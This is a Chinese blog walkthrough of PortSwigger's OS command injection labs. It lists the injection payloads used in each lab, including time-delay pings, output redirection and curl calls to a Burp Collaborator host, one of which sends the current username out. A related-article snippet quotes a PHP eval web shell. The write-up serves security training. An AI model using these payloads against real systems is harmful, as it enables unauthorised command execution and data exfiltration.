BurpSuite靶场系列之OS命令注入

最新推荐文章于 2024-01-28 20:09:10 发布
最新推荐文章于 2024-01-28 20:09:10 发布
阅读量582 收藏 2
点赞数
分类专栏: burpsuite 靶场 文章标签: 服务器 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/127445912
版权

Portswigger web security academy:OS command injection

环境

本次推荐的模拟环境如下:https://portswigger.net/web-security
邮箱注册登录
https://portswigger.net/web-security/all-labs
找到OS command injection
在这里插入图片描述

OS command injection, simple case

在这里插入图片描述
点一个产品进行浏览进行抓包
在这里插入图片描述

在这里插入图片描述

storeId=1|whoami

在这里插入图片描述

Blind OS command injection with time delays

在这里插入图片描述

在这里插入图片描述
email=真实邮箱||ping±c+10+127.0.0.1||
email=dzs12237%40yuoia.com||ping±c+10+127.0.0.1||
在这里插入图片描述

Blind OS command injection with output redirection

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
https://0a64000404d1dde5c11999cc008e00f7.web-security-academy.net/image?filename=output.txt

email=dzs12237%40yuoia.com||whoami>/var/www/images/outpu.txt||

在这里插入图片描述

Blind OS command injection with out-of-band interaction

在feedback功能点存在命令注入(盲注)
输入的命令会异步执行,从返回中不会得到任何信息,并且无法将结果重定向到可以访问到的目录,但可以使用外带(out-of-band)
要求执行一个DNS lookup,(利用 collaborator)

在这里插入图片描述

反馈你提交,抓包邮箱处构造
直接构造payload

||curl%20xxx.burpcollaborator.net||即可

burp Collaborator 使用:
有的自带无需安装
较低版本的burp 的 extender 下的 bapp store 找到 Collaborator 安装即可。安装后,首先需要设置下我们使用的服务器是官方默认提供的,在 project options-misc-burp collaborator server 下,选择第一个默认官方服务即可,第二个是关闭 collaborator,第三个是使用自己的服务器。如下图。
在这里插入图片描述
点击 Run health check 可以测试外带服务器服务是否正常

在这里插入图片描述
csrf=gtMV2Hk0lrSVfIw2gPwBfCqKIqsdzcsW&name=11&email=bxn55019%40yuoia.com||curl b9l.burpcollaborator.net||&subject=11&message=11
在这里插入图片描述

Blind OS command injection with out-of-band data exfiltration

在feedback功能点存在命令注入(盲注)
输入的命令会异步执行,从返回中不会得到任何信息,并且无法将结果重定向到可以访问到的目录,但可以使用外带(out-of-band)得到结果
要求通过外带获得当前用户名

在这里插入图片描述

email=333432%40qq.com||a=whoami;curl%20xlmor0wswc5r80n4ol6zncqio9u3is.burpcollaborator.net/`$a`||

在这里插入图片描述

GuiltyFet
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
linux之history和!命令联合使用
码莎拉蒂
12-04 2064
1 问题 linux平台查找过去的使用的命令 2 解决方法 1)history和! id联合使用 输入histroy命令,部分 显示如下 2008 echo 11 > 1.txt 2009 histroy 然后!id !2008 echo 11 > 1.txt 如果!(命令的一部分),那么效果是执行最后一次符合这个一部分的命令 ...
【Burp入门第二十三篇】Burpsuite+SQL注入实现登录绕过等+实战案例
最新发布
等风来
04-08 655
在 Oracle 数据库上,每个语句都必须指定一个要选择的表。Oracle 上有一个名为。只有商品名匹配且该商品已发布(released=1),客户端才能回显数据。只有商品名匹配且该商品已发布(released=1),客户端才能回显数据。点击Lifestyle时,页面回显。查询数据库类型及版本(存在一个业务场景如下。
BurpSuit官方实验室之命令注入
tpaer的博客
11-14 794
这是BurpSuit官方的实验室靶场,以下将记录个人命令注入共5个Lab的通关过程。
Lab: Blind XXE with out-of-band interaction | Lab: Blind XXE with out-of-band interaction via XML pa...
Zeker62的博客
08-26 326
什么是盲XXE? 当应用程序容易受到XXE 注入但不返回其响应中任何定义的外部实体的值时,就会出现盲 XXE 漏洞。这意味着直接检索服务器端文件是不可能的,因此盲 XXE 通常比常规 XXE 漏洞更难被利用。 有两种广泛的方法可以找到和利用盲 XXE 漏洞: 您可以触发带外网络交互,有时会在交互数据中泄露敏感数据。 您可以通过错误消息包含敏感数据的方式触发 XML 解析错误。 使用带外 ( OA...
操作系统命令注入OS command injection)学习笔记
汗的博客
05-06 5307
笔者burpsuite在线安全学院的OS command injection学习笔记。限于本人水平,笔记质量不是很高,假如有看到的大佬轻喷,很多地方是Google翻译的,还请多多包涵。 文章目录什么是OS命令注入?执行任意命令Lab: OS command injection, simple case有用的命令OS盲注使用时间延迟检测OS盲注Lab: Blind OS command inject...
burpsuit 靶场(OS command injection)
wanan的博客
01-23 107
burpsuit 靶场(OS command injection)
【技术分享】梨子带你刷burpsuite靶场系列之客户端漏洞篇 – 基于DOM的漏洞 .pdf
09-05
【技术分享】本文将带你深入理解基于DOM的漏洞,这是burpsuite靶场系列中关于客户端漏洞的一个重要主题。Burpsuite,由PortSwigger发行,是网络安全专家必不可少的工具,其在线网络安全学院提供了丰富的实践资源,...
BurpSuite之HaE插件配置文件
01-30
HaE是BurpSuite敏感信息标记插件,官方下载地址为: https://raw.githubusercontent.com/gh0stkey/HaE/gh-pages/Config.yml
burpsuite小白教程。手把手教学 使用burpsuite拦截浏览器请求,修改请求参数,查看返回结果
06-09
Burpsuite是一款强大的网络安全工具,尤其在Web应用安全测试领域有着广泛的应用。它是一个集成的平台,包含了多种功能模块,如拦截HTTP代理、扫描器、入侵检测系统等,用于帮助安全专家进行渗透测试和应用程序安全...
BurpSuite手册-016-Burp Suite tools-inspector
07-01
本人自己翻译的Burp Suite 专业版的中文手册,陆续更新,请期待
BurpSuite使用介绍(一)
02-21
BurpSuite是用于攻击web应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息,持久性,认证,代理,日志,警报的一个强大...
「 典型安全漏洞系列 」07.OS命令注入详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-28 1769
操作系统命令注入OS command injection)是一种Web安全漏洞,允许攻击者在运行应用程序的服务器上执行任意操作系统(OS命令,通常会完全破坏应用程序及其所有数据。在这种攻击中,攻击者通过输入恶意代码来利用应用程序中的漏洞,从而在服务器上执行任意命令。这些命令可以包括删除文件、窃取数据、更改配置等。
burpstite练兵场之命令注入
wqz1251251的博客
04-30 2786
目录 1.Lab:OS命令注入,简单案例 2.Lab:具有时间延迟的盲操作系统命令注入 3.Lab:带有输出重定向的盲操作系统命令注入 1.Lab:OS命令注入,简单案例 首先先打开靶场: 点击第一个查看详情时可以发现其url中存在一个参数,这里有可能会产生漏洞故而尝试在其构建命令语句|whoami 尝试后查看回显结果为错误代码400客户端错误,说明命令注入的漏洞可能不在这里。 正常进入后发现在其网页下端有一个检查库存的用户交互按钮,点击之后弹出如下数据包信息。 可以.
DVWA系列(二)——使用BurpSuite进行Command injection命令注入
weixin_45116657的博客
08-21 907
Command Injection命令注入)简介: 1、命令执行概念: 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围;PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一。也就好比一句话<?php @eval($_POST[cmd]);?> ...
【小白靶场学习】DVWA靶场篇——Command Injection命令注入
u013569931的博客
11-14 600
人菜瘾还大的小白靶场修真路
4 OS command injection操作系统命令注入
(∪.∪ )...zzz的博客
04-29 888
4 OS command injection操作系统命令注入 目录4 OS command injection操作系统命令注入一、What is OS command injection?二、Executing arbitrary commandsLab: OS command injection, simple case三、 Useful commands In this section, we’ll explain what OS command injection is, describe how v
bWAPP----OS Command Injection
weixin_30588907的博客
07-14 167
OS Command Injection 界面: 给一个域名,它帮你返回DNS 代码: 1 <div id="main"> 2 3 <h1>OS Command Injection</h1> 4 5 <form action="<?php echo($_SERVER["SCRIPT_NAME...
WEB安全基础入门—操作系统命令注入(shell 注入
Eason_LYC安全白帽子的成长博客
06-09 1931
WEB安全基础入门—操作系统命令注入(shell注入) 欢迎关注订阅专栏! WEB安全系列包括如下三个专栏: 《WEB安全基础-服务器端漏洞》 《WEB安全基础-客户端漏洞》 《WEB安全高级-综合利用》 知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路! 欢迎关注订阅专栏!......
burpsuite靶场
09-14
Burp Suite靶场是一套用于测试和演示网络安全的目标应用程序集合。这个靶场旨在帮助安全专业人员在实践中提高他们的技能,并提供一个安全的环境来测试和演示各种攻击和漏洞利用技术。 在Burp Suite靶场中的客户端漏洞篇,主要涵盖了基于DOM的漏洞。DOM(Document Object Model)是一种用于处理HTML和XML文档的编程接口。基于DOM的漏洞是由于Web应用程序对用户提供的输入数据进行不充分或不正确的处理而引起的。这些漏洞可能导致跨站脚本攻击(XSS)和其他安全问题。 爆破当前数据库信息(--current-db)和爆破所有数据库信息(--dbs)是使用sqlmap工具的示例命令。sqlmap是一款专门用于检测和利用SQL注入漏洞的工具。通过提供目标URL和必要的参数,sqlmap可以自动扫描并利用可能存在的SQL注入漏洞。这些命令用于获取目标应用程序的数据库信息,从而了解目标系统的底层结构。 总之,通过Burp Suite靶场中的客户端漏洞篇和sqlmap工具的使用,安全专业人员可以更深入地了解和测试基于DOM的漏洞以及利用SQL注入漏洞获取数据库信息的技术。这些技术和知识对于安全评估和漏洞挖掘非常重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值